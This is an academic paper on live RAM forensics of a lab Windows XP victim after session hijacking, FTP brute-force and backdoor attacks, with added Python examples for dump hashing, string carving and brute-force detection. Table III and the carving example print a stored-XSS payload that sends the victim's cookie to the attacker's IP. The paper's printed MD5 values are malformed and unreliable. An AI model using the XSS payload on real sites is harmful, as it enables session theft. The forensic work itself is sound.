
2017 Fifth International Conference on Information and Communication Technology (ICoICT)

Digital Forensics Random Access Memory Using Live Technique Based On Network Attacked

Periyadi, Giva Andriana Mutiara, Roni Wijaya
Applied Science School, Telkom University, Bandung, Indonesia
periyadi@tass.telkomuniversity.ac.id, giva.andriana@tass.telkomuniversity.ac.id, roni.wijaya.2728@gmail.com

Abstract—Information and communication technologies are developing rapidly, and the data they process and store must be protected accordingly. One of the techniques used in data security is digital forensics: an investigative technique for identifying and collecting information from digital storage as evidence that can expose crimes in a legally defensible way. In this research we use a live digital forensics technique. Investigations using live forensics require special handling, because the volatile data in Random Access Memory (RAM) is lost if the system is powered off during the investigation. The investigation is conducted by dumping the memory of the attacked system and transferring the dump file to the investigator's system. We examine the data inside the RAM and analyze its accuracy for several cyber attacks: session hijacking, an FTP attack, and illegal access. The results show that all three attacks can be investigated and produce evidence that is authentic, reliable, and defensible.

Keywords—digital forensics; memory dump; live forensics; memory acquisition; Random Access Memory

ISBN: 978-1-5090-4911-0 (c) 2017 IEEE

I. INTRODUCTION

The use of information and communication technology has become very important and must be present in the development of any institution or company. Unwittingly, this dependency also increases technology- and communication-related crime, which is a risk for institutions and companies.

The existence of laws on information and electronic transactions has so far contributed little to the enforcement of legal cases in Indonesia, because these laws appear to regulate only the flow of electronic information in general. Many details that arise in legal cases and enforcement issues in Indonesia are not yet regulated by law. Those details are instead taken as a reference for information technology security, which leads to digital forensics.

Inside a computer system, the main memory, known as Random Access Memory (RAM), is a very important component [1]. RAM is volatile storage: its contents are lost when there is no electricity [1]. Volatile data in RAM is very useful for the forensic process, because the RAM of a computer system describes all the activity that occurred on the system while it was running.

Memory forensics is the process of analyzing the volatile data in RAM to obtain digital evidence that can be accounted for [2]. Volatile data in RAM must be handled carefully, because it is lost if the system is turned off. Memory forensics techniques are therefore needed that preserve the integrity of the volatile data without losing data that could be evidence.

The security researchers Sam Stover and Matt Dickerson performed digital forensics on non-volatile storage, such as a hard drive that had been physically removed, using The Coroner's Toolkit (TCT) [3]. Timothy Vidas researched the acquisition and analysis of Random Access Memory, discussed the benefits and drawbacks of traditional incident response methods compared with an augmented model that includes the capture and subsequent analysis of a suspect system's memory, and provided a foundation for analyzing captured memory [4].

In this research, we investigate the data in Random Access Memory using live forensics and analyze the accuracy of the resulting memory-forensic data across several test scenarios. The attack scenarios are session hijacking, an FTP attack, and illegal access, launched from a 64-bit Kali Linux 2.0 operating system.

II. LITERATURE STUDY

A. Digital Forensics

Digital forensics is the use of analysis and investigation techniques to identify, collect, examine, and preserve information stored on digital storage so that it can be used as evidence to expose crimes in a legally defensible way [5]. Digital forensics is commonly used in both criminal law and private investigation.

Fig. 1 shows the digital forensics process. The first step is collection of the data: digital media that can hold evidence, such as flash disks, mobile phones, memory, and hard disks, are collected for examination in the next step. The second step is examination, in which the collected data is cloned or imaged. This is done by making a bit-stream copy of the data in a safe place. A bit-stream image is made by copying every bit of the original data, including hidden files, temporary files, fragmented files, and files that have been deleted but not yet overwritten.

Fig. 1. Forensics process (collection, examination, analysis, reporting).

The third step is analysis. In this step all the data is analyzed and recovery is performed to restore files and folders; MD5 hashes are used to check the data. The last step is reporting: presenting and describing the investigation report and the analyzed evidence in detail, so that it can be justified scientifically.

B. Random Access Memory

Random Access Memory is the main memory of a computer. RAM is volatile, meaning that its data is lost when the computer is powered off. RAM stores data temporarily and is accessed randomly; the data requested by the processor, and the data flowing back from RAM, move dynamically and at very high speed [6].

Fig. 2. Random Access Memory (hardware module).

Fig. 2 shows the RAM hardware that serves as the main memory of a computer system. The RAM of the computer system is analyzed to find evidence of the attacker's intrusion. RAM capture is the process of capturing live memory from a running computer system, and RAM analysis consists of performing forensic analysis on the data gathered from the live computer.

After a memory dump of a live machine has captured its RAM, the memory image can be used to determine information about running programs, the operating system, and the overall state of the computer, as well as to locate deleted or temporary information that might not be found on a normal disk image [7].

Many tools are available to capture RAM for forensic analysis and to analyze the result: FTK Imager, win64dd, and DumpIt (MoonSols Windows Memory Toolkit, MWMT) acquire the memory, and Volatility (packaged as a Kali Linux tool) analyzes the resulting dump.

C. Operating System

An operating system (OS) is a program that controls the execution of application programs and acts as the interface between the user, the computer, and the computer hardware. An operating system has a kernel, the program that handles input/output requests from software and translates them into instructions for the processor or other electronic components of the computer. In general, an operating system is divided into several parts: (1) the boot mechanism, which places the kernel into memory; (2) the kernel, the core of the operating system; (3) the shell or command interpreter, which reads input from the user; and (4) the libraries, which provide the basic sets of functions and instructions of the operating system [8].

D. Live Forensics

Memory forensics is one of the existing forensic techniques. In digital forensics there are two techniques: traditional forensics and live forensics. Traditional, or offline, forensics was the first technique used in computer forensics and is commonly used by researchers. It requires the investigator to shut down the attacked system, in order to stop any malicious process running on the system that could delete data important to the investigation [9].

Fig. 3. Flowchart of live forensics.

Live forensics, by contrast, is an enhancement of traditional forensics. It is performed on the volatile data of a computer system [9] and differs greatly from the traditional technique, because the data must be investigated while the system is running.

Live forensic analysis is divided into two approaches: internal analysis and external analysis. Internal analysis, commonly called incident response, is performed directly on the attacked system. External analysis first acquires the memory (memory dumping or memory imaging), using software installed on the attacked system that produces a digital file containing a static snapshot of the attacked system's volatile memory [9]. The result of the memory dump is an image file that can be moved to the investigator's system for further analysis. Fig. 3 shows the steps of live forensics.

III. SYSTEM DESIGN REQUIREMENTS

This research investigates an attacked system. Before designing the system, we analyzed its requirements. The system requires three virtual machines, used as the investigator (host), the victim (Windows), and the attacker (Kali Linux). Their specifications are given in the following table.
TABLE I. SPECIFICATION OF THE VIRTUAL MACHINES
VM no. | Acts as | Hardware and software specification
1 (VirtualBox GUI 4.3.36) | Investigator (host) | 64-bit Xubuntu 14.04.1 LTS, IP address 192.168.25.1; software: Volatility, Bulk Extractor, Wireshark
2 (VirtualBox GUI 4.3.36) | Victim | 32-bit Windows XP SP3 Professional, IP address 192.168.25.101; software added: browser, XAMPP, DVWA
3 (VirtualBox GUI 4.3.36) | Attacker | 64-bit Kali Linux, IP address 192.168.25.102
Based on the specification above, the testing topology designed for this research is shown in Fig. 4.

Fig. 4. Topology of the testing system: the investigator (Ubuntu 14.04.1 LTS 64-bit), the victim (Windows XP SP3 Professional 32-bit), and the attacker (Kali Linux 2.0 64-bit) run on VirtualBox GUI 4.3.36 and are connected through a host-only network.

After designing the testing topology, we designed a procedure to implement the system in accordance with the requirements. The procedure is shown in Fig. 5.

Fig. 5. Implementation flowchart.

IV. INVESTIGATION AND RESULT ANALYSIS

After determining the system requirements, the testing topology, and the implementation, the next step is the investigation and analysis. The implementation of each virtual machine follows the requirements planned in the previous section.

Fig. 6 shows the logic testing diagram, that is, the steps the investigator follows to obtain evidence of the intrusion. The diagram is adapted from the forensics process.

Fig. 6. Logic testing diagram:
Collection: the victim's system; memory dump with FTK Imager or dd.
Examination: installation of the memory dump process; information obtained from the memory dump.
Analysis: the digital file produced by the memory dump, analyzed with Volatility.
Result: (1) evidence of the intrusion; (2) evidence of the hole used for the intrusion; (3) the file proven from the digital-evidence analysis.
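The collection and examination steps of Fig. 6, and the transfer of the dump to the investigator's system described in Section II.D, both rest on being able to show that the file analyzed is the file that was acquired. The following Python example is added by the editor and is not part of the paper or of its tooling: it streams a dump through MD5 and SHA-256 (so a 512 MB image is never loaded whole), writes an acquisition record, and verifies a transferred copy against that record. The file name, the random content, and the flipped byte are constructed for the example; on a real case the dump is hashed on the victim immediately after FTK Imager or dd writes it, and again on the investigator host after the transfer.

```python
import hashlib
import io
import os
import shutil
import tempfile
from dataclasses import dataclass
from datetime import datetime, timezone

CHUNK = 1024 * 1024  # hash 1 MiB at a time; a 512 MiB dump never has to fit in memory


def hash_stream(fh):
    """Return (md5, sha256) hex digests of a binary stream in one pass."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    for chunk in iter(lambda: fh.read(CHUNK), b""):
        md5.update(chunk)
        sha256.update(chunk)
    return md5.hexdigest(), sha256.hexdigest()


def hash_bytes(data):
    return hash_stream(io.BytesIO(data))


def hash_file(path):
    with open(path, "rb") as fh:
        return hash_stream(fh)


@dataclass(frozen=True)
class AcquisitionRecord:
    """What goes into the evidence log the moment the dump is written on the victim."""
    file_name: str
    file_size: int
    md5: str
    sha256: str
    recorded_at: str


def record_acquisition(path):
    md5, sha256 = hash_file(path)
    return AcquisitionRecord(
        file_name=os.path.basename(path),
        file_size=os.path.getsize(path),
        md5=md5,
        sha256=sha256,
        recorded_at=datetime.now(timezone.utc).isoformat(timespec="seconds"),
    )


def verify_copy(record, copy_path):
    """True only if the transferred copy has the same size and both digests."""
    if os.path.getsize(copy_path) != record.file_size:
        return False
    md5, sha256 = hash_file(copy_path)
    return md5 == record.md5 and sha256 == record.sha256


def demo():
    """Constructed stand-in for a dump: 4 MiB of random bytes, one intact copy and one
    copy with a single flipped byte (same size, so size alone would not catch it)."""
    work = tempfile.mkdtemp()
    try:
        dump = os.path.join(work, "22juni2016-SH.mem")   # name borrowed from Table II
        with open(dump, "wb") as fh:
            fh.write(os.urandom(4 * 1024 * 1024))
        rec = record_acquisition(dump)

        intact = os.path.join(work, "intact.mem")
        shutil.copyfile(dump, intact)

        tampered = os.path.join(work, "tampered.mem")
        shutil.copyfile(dump, tampered)
        with open(tampered, "r+b") as fh:
            fh.seek(4096)
            orig = fh.read(1)
            fh.seek(4096)
            fh.write(bytes([orig[0] ^ 0xFF]))

        return verify_copy(rec, intact), verify_copy(rec, tampered)
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    print(demo())  # (True, False)
```

Recording two digests costs one extra pass of arithmetic over the same read, and the SHA-256 value remains useful if an MD5 collision is ever raised against the evidence.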

A. Investigation

The testing scenarios for this investigation are several cyber attack techniques. The first scenario is session hijacking, the process of taking control of the victim's session. To do so, the attacker needs the authentication session ID stored in the cookie, so the attacker tries to obtain the victim's cookie.

The second scenario is an FTP attack, the process of taking control of the system through a security gap in FTP. The attacker performs a brute-force attack on FTP. After successfully entering the system, the attacker performs activities on the victim's system.

The last scenario is illegal access. In this scenario the attacker accesses the victim's system through the network. The attacker tries to find a hole in the network security and enters the system through that gap. Once inside, the attacker makes changes and downloads files, and then uploads a payload onto the system.

All the scenarios are then examined from the investigator's side. To determine the accuracy of the method, the investigator should identify the attacker's IP address, the security hole used to log in to the system, the changes made by the attacker, the files downloaded by the attacker, the payload, and the timing of the attack.

Fig. 7 shows the flow diagram of all the intrusion scenarios against the system.

Fig. 7. Scenario flowchart.
Session hijacking: scan the target, choose the target and its running services; if HTTP and MySQL are found, access DVWA with security set to low, insert the XSS script, start a listener on port 80, check that the XSS script runs, obtain the target system information, change the session ID, and access the website with the victim's session ID.
FTP attack: scan the target, choose the target and its running services; if an FTP service is found, brute-force the FTP server with a password list; if a password is found, log in to the FTP server, upload the backdoor, and work from the victim's computer.
Illegal access: scan and choose the target; if a backdoor can be infiltrated, run the backdoor using the exploit and wait until it is opened by the target; when the backdoor responds, a terminal opens and the attacker carries out activities on the victim's computer.

All the systems intruded by the attacker are then investigated, with different investigation steps. The investigation flowchart is shown in Fig. 8. The investigations of session hijacking and of the FTP attack follow the same steps, while the investigation of illegal access differs from the other two.

Fig. 8. Investigation flowchart. For each scenario (session hijacking, FTP attack, illegal access): dump the memory, record all the information from the memory dump, and run the Volatility analysis (plugins such as imageinfo, pstree, and dlllist). For session hijacking and the FTP attack, network analysis is also needed: run Bulk Extractor, take packets.pcap and record all its information, open packets.pcap in Wireshark and analyze it, then document the evidence. For illegal access, document the evidence directly after the Volatility analysis.

B. Result Analysis

The results of the investigation of the tested intrusion scenarios are described briefly in terms of the information file of the memory dump, the information file of the packets (pcap), the information file of the MAC-time timeline, and a summary of the result analysis for each intrusion scenario.

• Session Hijacking

The information file of session hijacking is given in Table II, and the summary of the session-hijacking result analysis in Table III.
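Before the tables, it helps to see where items such as the attacker's IP address, the victim's PHPSESSID, the XSS payload and the uploaded file name come from: they are plain strings left in the victim's RAM by the browser and the web server, and a Bulk Extractor style pass over the raw dump recovers them without any profile or plugin. The following Python example is added here and is not the authors' code: it carves IPv4 addresses, PHP session IDs, HTTP request lines, script tags and file names out of a constructed memory fragment (the bytes are made up to resemble what Table III reports; nothing is taken from the paper's dumps) and flags any request that carries the session ID to a host other than the victim, which is the cookie-theft traffic that document.location=...+document.cookie generates.

```python
import re

# Constructed memory fragment standing in for part of the victim's dump. The strings mirror what
# Table III reports (victim 192.168.25.101, attacker 192.168.25.102, the DVWA cookie and payload),
# padded with non-text bytes; none of it is taken from the paper's actual memory images.
FAKE_DUMP = (
    b"\x00" * 64
    + b"GET /dvwa/vulnerabilities/xss_s/ HTTP/1.1\r\nHost: 192.168.25.101\r\n"
    + b"Cookie: security=low; PHPSESSID=1eerlridi5n06nobd8nkhpatg6\r\n\r\n"
    + b"\x00\xff" * 32
    + b"<script>document.location='http://192.168.25.102/?'+document.cookie;</script>"
    + b"\x00" * 16
    + b"GET /?security=low;%20PHPSESSID=1eerlridi5n06nobd8nkhpatg6 HTTP/1.1\r\n"
    + b"Host: 192.168.25.102\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:38.0)\r\n"
    + b"\x00" * 16
    + b"C:\\xampp\\htdocs\\dvwa\\hackable\\uploads\\etc.php\x00penting.exe\x00"
    + b"\x00" * 64
)

IPV4_RE = re.compile(rb"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
SESSID_RE = re.compile(rb"PHPSESSID=([A-Za-z0-9]{20,40})")
HTTP_RE = re.compile(rb"(GET|POST) (\S+) HTTP/1\.[01]\r\nHost: ([^\r\n]+)")
SCRIPT_RE = re.compile(rb"<script>.*?</script>", re.DOTALL)
FILENAME_RE = re.compile(rb"[A-Za-z0-9_.-]+\.(?:php|exe|dll|bat|vbs)\b")


def carve_ipv4(blob):
    """Dotted quads whose octets are all <= 255, de-duplicated and sorted."""
    found = set()
    for m in IPV4_RE.finditer(blob):
        if all(int(o) <= 255 for o in m.group(1).split(b".")):
            found.add(m.group(1).decode())
    return sorted(found)


def carve_session_ids(blob):
    return sorted({m.group(1).decode() for m in SESSID_RE.finditer(blob)})


def carve_http_requests(blob):
    """(method, path, host) for every request line that is followed by its Host header."""
    return [tuple(g.decode() for g in m.groups()) for m in HTTP_RE.finditer(blob)]


def carve_scripts(blob):
    return [m.group(0).decode(errors="replace") for m in SCRIPT_RE.finditer(blob)]


def carve_filenames(blob):
    return sorted({m.group(0).decode() for m in FILENAME_RE.finditer(blob)})


def cookie_exfil_indicators(blob, victim_host):
    """Requests that carry a PHPSESSID in the URL and go to a host other than the victim:
    exactly the traffic the stored-XSS payload produces in the victim's browser."""
    hits = []
    for method, path, host in carve_http_requests(blob):
        m = SESSID_RE.search(path.encode())
        if m and host != victim_host:
            hits.append((host, m.group(1).decode()))
    return hits


def evidence_summary(blob, victim_host):
    """A Table III style summary an investigator can fill from the carved strings alone."""
    exfil = cookie_exfil_indicators(blob, victim_host)
    return {
        "attacker_ips": sorted({host for host, _ in exfil}),
        "victim_session_ids": carve_session_ids(blob),
        "xss_scripts": carve_scripts(blob),
        "files_of_interest": carve_filenames(blob),
        "hosts_seen": carve_ipv4(blob),
    }


if __name__ == "__main__":
    for key, value in evidence_summary(FAKE_DUMP, "192.168.25.101").items():
        print(f"{key}: {value}")
```

On a real 512 MB image the same regular expressions are run over the file with a memory map rather than a bytes literal; the point of the host check in cookie_exfil_indicators is that the session ID appearing in RAM is normal (the victim's own cookie header), while the session ID appearing in a request to any other host is the evidence.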
TABLE II. INFORMATION FILE OF SESSION HIJACKING
Parameter | Dump memory | Packets.pcap | Timeline MAC-time
File name | 22juni2016-SH.mem | Packets.pcap | Timeline-mactime.txt
File size (bytes) | 536805376 | 172689 | 5131951
File address | /media/cyber/3C0A072C0A06E2AE/capturememory/22juni2016-SH.mm | /home/cyber/out-bulk/22juni2016-SH/packets.pcap | /home/cyber/timeliner/SH/timeline-mactime.txt
MD5sum (as printed) | 245538328fdd873cf4d9e3392e5668c461566e90 | Cb94e3cd7282b70761656a710d8300e9710 | 940d40f2f186c2577dc5
Image local date and time | 2016-06-22 17:26:59 +0700 | - | -
Last modify | 2016-06-22 17:27:47.238921000 +0700 | 2016-07-15 23:11:28.400380827 +0700 | 2016-07-16 17:35:23.249904995 +0700
Last change | 2016-06-22 19:43:20.558112600 +0700 | 2016-07-15 23:11:28.400380827 +0700 | 2016-07-16 17:55:12.957931311 +0700

Note that the digests printed in Tables II, IV, and VI are not 32 hexadecimal characters long, so they cannot be checked against the files as MD5 values.

After analyzing the MAC-time timeline file, we discovered some suspicious lines. The parsed file in Fig. 9 shows a file named "etc.php", which is suspicious and attributed to the attacker.

Fig. 9. Suspicious file in the parsed timeline (session hijacking).

TABLE III. RESULT ANALYSIS OF SESSION HIJACKING
Parameter | Description
Victim's operating system | Windows XP SP2 x86 and Windows XP SP3 x86
Victim's PHPSESSID | 1eerlridi5n06nobd8nkhpatg6
Attacker's IP address | 192.168.25.102
Attacker's operating system | Linux x86_64
Attacker's browser | Firefox/38.0, Iceweasel/38.8.0
XSS script | <script>document.location=http://192.168.25.102/?+document.cookie;</script>
Security gap | DVWA security = low
Port | 80
Protocol | TCP
File uploaded | etc.php
Method of attack | Session hijacking
Time of intrusion | unknown

The simplest treatment to prevent session hijacking is to filter user input, so that users cannot insert HTML tags into the comment field or other fields. The results in Table III are presented as evidence.

• FTP Attack

The information file of the FTP attack is given in Table IV, and the summary of the FTP-attack result analysis in Table V.

TABLE IV. INFORMATION FILE OF FTP ATTACK
Parameter | Dump memory | Packets.pcap | Timeline MAC-time
File name | 14juli2016-FTP.mem | Packets.pcap | Timeline-mactime.txt
File size (bytes) | 536805376 | 306421 | 3728513
File address | /media/cyber/3C0A072C0A06E2AE/capture\memory/14juli2016-FTP.mm | /home/cyber/out-bulk/14juli2016-FA/packets.pcap | /home/cyber/timeliner/FA/timeline-mactime.txt
MD5sum (as printed) | 84dee785935268c161d612be2affbfc4e267a7 | D92108805ce72625a78bb928cbcefcf6b9 | B6799857922fa2a558b6d0a9
Image local date and time | 2016-07-14 23:15:35 +0700 | - | -
Last modify | 2016-07-14 23:16:17.486024000 +0700 | 2016-07-16 22:23:35.070287482 +0700 | 2016-07-17 19:18:07.861833909 +0700
Last change | 2016-07-14 23:18:22.605275100 +0700 | 2016-07-16 22:23:35.070287482 +0700 | 2016-07-17 19:18:07.861833909 +0700

After analyzing the MAC-time timeline file, we discovered some suspicious lines. The parsed file in Fig. 10 shows a file named "penting.exe", which is suspicious and attributed to the attacker.

Fig. 10. Suspicious file in the parsed timeline (FTP attack).

The simplest handling to avoid brute force is to use passwords that combine capital letters, numbers, and special characters and are longer than 8 characters, to limit the number of login attempts, and to install a firewall on the network. The results in Table V are presented as evidence.

TABLE V. RESULT ANALYSIS OF FTP ATTACK
Parameter | Description
Victim's operating system | Windows XP SP2 x86 and Windows XP SP3 x86
Attacker's IP address | 192.168.25.102
Security gap | FTP server
Port | 21
Protocol | FTP
User name | Root
File uploaded | Penting.exe
Method of attack | Brute force
Time of intrusion | unknown

• Illegal Access

The information file of illegal access is given in Table VI, and the summary of the illegal-access result analysis in Table VII.
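Tables III, V, and VII list the time of intrusion as unknown, although packets.pcap and the MAC-time timeline carry the timestamps needed to establish it. The following Python example is added here and is not the paper's own code; it serves both the FTP-attack analysis (brute force on the control channel, as examined in Wireshark) and the timeline analysis (the mactime file in which penting.exe was found). It detects a client that logs in after repeated 530 rejections, recovers the guessed credentials from the plaintext FTP exchange, and then looks in a Sleuth Kit body-format timeline (the input mactime reads; Volatility 2's timeliner can write it with --output=body) for files that appeared on the victim right after that login. The FTP records, the password list, the file paths and the timestamps are all constructed for the example; the record layout is what Follow TCP Stream shows for port 21, with a timestamp, source and destination added per line.

```python
from datetime import datetime, timedelta, timezone

WIB = timezone(timedelta(hours=7))  # UTC+07:00, the zone the paper's tables use

# Constructed FTP control-channel exchange: (epoch seconds, src, dst, line). The guesses, the
# addresses and the times are made up for this example; only the 331/530/230 semantics are FTP's.
GUESSES = ["123456", "password", "qwerty", "admin", "letmein", "root", "toor"]


def constructed_ftp_records(attacker="192.168.25.102", victim="192.168.25.101",
                            user="root", start=1468512300.0):
    recs, t = [], start
    for i, pw in enumerate(GUESSES):
        ok = i == len(GUESSES) - 1               # only the last guess is accepted
        recs += [
            (t, attacker, victim, f"USER {user}"),
            (t + 0.01, victim, attacker, f"331 Password required for {user}"),
            (t + 0.02, attacker, victim, f"PASS {pw}"),
            (t + 0.20, victim, attacker, "230 User logged in." if ok else "530 Login incorrect."),
        ]
        t += 0.5
    recs.append((t + 5.0, attacker, victim, "STOR penting.exe"))  # the upload after login
    return recs


def detect_ftp_bruteforce(records, threshold=5, window=60.0):
    """A login (230) preceded by at least `threshold` rejections (530) of the same client
    within `window` seconds is reported together with the credentials seen on the wire."""
    state, findings = {}, []

    def blank():
        return {"user": None, "password": None, "fails": []}

    for t, src, dst, line in sorted(records):
        code, _, arg = line.partition(" ")
        if code in ("USER", "PASS"):                     # client -> server
            s = state.setdefault((src, dst), blank())
            s["user" if code == "USER" else "password"] = arg
        elif code in ("530", "230"):                     # server -> client, so the key is reversed
            s = state.setdefault((dst, src), blank())
            s["fails"] = [f for f in s["fails"] if t - f <= window]
            if code == "530":
                s["fails"].append(t)
            elif len(s["fails"]) >= threshold:
                findings.append({"attacker": dst, "victim": src, "user": s["user"],
                                 "password": s["password"],
                                 "failed_attempts": len(s["fails"]), "logged_in_at": t})
    return findings


# Constructed Sleuth Kit body-format lines: MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime
BODY = """\
0|[FILE] \\WINDOWS\\system32\\kernel32.dll|0|r/rrwxrwxrwx|0|0|989696|1468512000|1208174400|1208174400|1208174400
0|[FILE] \\xampp\\htdocs\\dvwa\\hackable\\uploads\\etc.php|0|r/rrwxrwxrwx|0|0|1473|1466583020|1466583020|1466583020|1466583020
0|[FILE] \\Documents and Settings\\Administrator\\Desktop\\penting.exe|0|r/rrwxrwxrwx|0|0|73802|1468512310|1468512310|1468512310|1468512310
0|[FILE] \\WINDOWS\\Prefetch\\PENTING.EXE-0A1B2C3D.pf|0|r/rrwxrwxrwx|0|0|12000|1468512330|1468512330|1468512330|1468512330
"""


def parse_body(text):
    rows = []
    for line in text.splitlines():
        if line.strip():
            f = line.split("|")
            rows.append({"path": f[1], "size": int(f[6]), "atime": int(f[7]),
                         "mtime": int(f[8]), "ctime": int(f[9]), "crtime": int(f[10])})
    return rows


def files_created_after(rows, epoch, within=600):
    """Files created (b) or modified (m) in (epoch, epoch + within], earliest first."""
    hits = [r for r in rows if any(epoch < r[k] <= epoch + within for k in ("crtime", "mtime"))]
    return sorted(hits, key=lambda r: min(r["crtime"], r["mtime"]))


def local(epoch):
    return datetime.fromtimestamp(epoch, WIB).strftime("%Y-%m-%d %H:%M:%S %z")


def correlate(records, body_text):
    """Fill the 'time of intrusion' from the pcap and list what landed on disk right after it."""
    rows = parse_body(body_text)
    return [{"attacker": f["attacker"], "user": f["user"], "password": f["password"],
             "failed_attempts": f["failed_attempts"],
             "time_of_intrusion": local(f["logged_in_at"]),
             "files_after_login": [r["path"] for r in files_created_after(rows, f["logged_in_at"])]}
            for f in detect_ftp_bruteforce(records)]


if __name__ == "__main__":
    for finding in correlate(constructed_ftp_records(), BODY):
        print(finding)
```

The window in files_created_after is deliberately short: the 230 response gives the lower bound of the intrusion, and anything created on the victim within minutes of it (the backdoor itself, its Prefetch entry) is a candidate; older files, such as the etc.php left by the earlier session-hijacking scenario, are not pulled in.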
TABLE VI. INFORMATION FILE OF ILLEGAL ACCESS
Parameter | Dump memory | Plugin dlllist | Timeline MAC-time
File name | 14juli2016-IA.mem | dllist-IA.txt | Timeline-mactime.txt
File size (bytes) | 536805376 | 4876 | 4961351
File address | /media/cyber/3C0A072C0A06E2AE/capture\memory/14juli2016-IA.mem | /home/cyber/Volatility\File/14juli2016-dlllist-IA.txt | /home/cyber/timeliner/FA/timeline-mactime.txt
MD5sum (as printed) | 931933c6aaf33808774287143202 | 13783bbfe8a418cd81d2719e96ad358fadab4 | Ea9834fcdc80ceabd6f136f75
Image local date and time | 2016-07-14 23:51:23 +0700 | - | -
Last modify | 2016-07-14 23:51:57.212861000 +0700 | 2016-07-18 00:59:56.706287554 +0700 | 2016-07-18 01:25:37.650321639 +0700
Last change | 2016-07-14 23:56:50.702238800 +0700 | 2016-07-18 00:59:56.706287554 +0700 | 2016-07-18 01:25:37.650321639 +0700

The information file of illegal access differs slightly from those of the FTP attack and session hijacking. We used the dlllist plugin in this investigation in order to obtain timeline-mactime.txt. Next, the investigator examined the history of console use; however, after repeated iterations nothing suspicious was found there. The results in Table VII are presented as evidence.

TABLE VII. RESULT ANALYSIS OF ILLEGAL ACCESS
Parameter | Description
Victim's operating system | Windows XP SP2 x86 and Windows XP SP3 x86
Attacker's IP address | 192.168.25.102
Port | 4444
Protocol | TCP
Backdoor | Penting.exe
Privilege escalation | Done by Penting.exe
DLL files accessed | Dlllist-IA.txt
Method of intrusion | Exploit backdoor
Time of intrusion | unknown

The simplest handling to avoid this kind of intrusion is to use firewall software, to update the antivirus regularly, and to use software that can detect anomalies in the network, such as Snort.

V. CONCLUSION

Based on the results of the investigation and the analysis of the system, we conclude that live forensics using a memory dump was carried out successfully, producing evidence from a system attacked by three attack methods over the network. This evidence can be accounted for and proven. To avoid all of these intrusions, user input should be filtered; passwords should combine capital letters, numbers, and special characters and be longer than 8 characters; login attempts should be limited; a firewall should be installed on the network; antivirus software should be updated regularly; and software that can detect anomalies in the network, such as Snort, should be used.

ACKNOWLEDGMENT

This publication is financed by the Directorate of Research and Community Services of Telkom University.

REFERENCES

[1] M. H. Ligh, A. Case, J. Levy, and A. Walters, The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Indianapolis: John Wiley & Sons, Inc., 2014.
[2] F. Adelstein, "Live forensics: diagnosing your system without killing it first," Communications of the ACM, vol. 49, no. 2, February 2006.
[3] S. Stover and M. Dickerson, "Using Memory Dumps in Digital Forensics," ;login: magazine, vol. 30, no. 5, December 2005.
[4] T. Vidas, "Starting a Framework for Analysis of Volatile Data Stores," Third Annual IFIP WG 11.9 International Conference on Digital Forensics, Orlando, Florida, Jan. 28-31, 2007.
[5] Asrizal, "Digital Forensik Apa dan Bagaimana," 30 December 2010. [Online]. Available: e-dokumen.kemenag.go.id/files/VQ2Hv7uT1339506324.pdf.
[6] A. S. Tanenbaum, Structured Computer Organization, 4th ed. Prentice Hall, 1999, pp. 200-201.
[7] C. Gross, "Digital Forensics RAM Analysis." [Online]. Available: http://nest.unm.edu/files/7114/1392/6819/USCyberCrime-CG.pdf.
[8] W. Stallings, Operating Systems, 4th ed. Prentice Hall, 2015, pp. 30-35.
[9] M. Lessing and B. von Solms, "Live Forensic Acquisition as Alternative to Traditional Forensic Processes," 2008.
